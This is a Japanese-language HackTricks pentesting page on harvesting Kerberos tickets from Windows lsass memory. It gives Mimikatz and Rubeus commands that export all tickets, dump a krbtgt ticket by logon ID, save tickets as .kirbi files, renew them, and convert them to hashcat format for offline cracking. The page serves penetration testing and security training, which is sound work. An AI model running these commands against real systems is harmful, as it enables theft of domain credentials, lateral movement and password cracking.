hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

4.7 KiB
Raw Blame History

Windowsからチケットを収集する

**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでAWSハッキングを学ぶ** こちら

HackTricksをサポートする他の方法

Windowsのチケットは、セキュリティポリシーを処理するlsassLocal Security Authority Subsystem Serviceプロセスによって管理および保存されます。これらのチケットを抽出するには、lsassプロセスとやり取りする必要があります。非管理者ユーザーは自分自身のチケットにのみアクセスできますが、管理者はシステム上のすべてのチケットを抽出する特権を持っています。このような操作には、MimikatzRubeusというツールが広く使用されており、それぞれ異なるコマンドと機能を提供しています。

Mimikatz

Mimikatzは、Windowsセキュリティとやり取りできる多目的ツールです。チケットの抽出だけでなく、さまざまな他のセキュリティ関連操作にも使用されます。

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeusは、Kerberosとのやり取りや操作に特化したツールです。チケットの抽出や処理、その他のKerberos関連の活動に使用されます。

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

これらのコマンドを使用する際は、<BASE64_TICKET><luid>などのプレースホルダーを実際のBase64エンコードされたチケットやログオンIDに置き換えてください。これらのツールは、チケットの管理やWindowsのセキュリティメカニズムとのやり取りに幅広い機能を提供します。

参考文献

htARTEHackTricks AWS Red Team Expert を通じてゼロからヒーローまでAWSハッキングを学ぶ

HackTricksをサポートする他の方法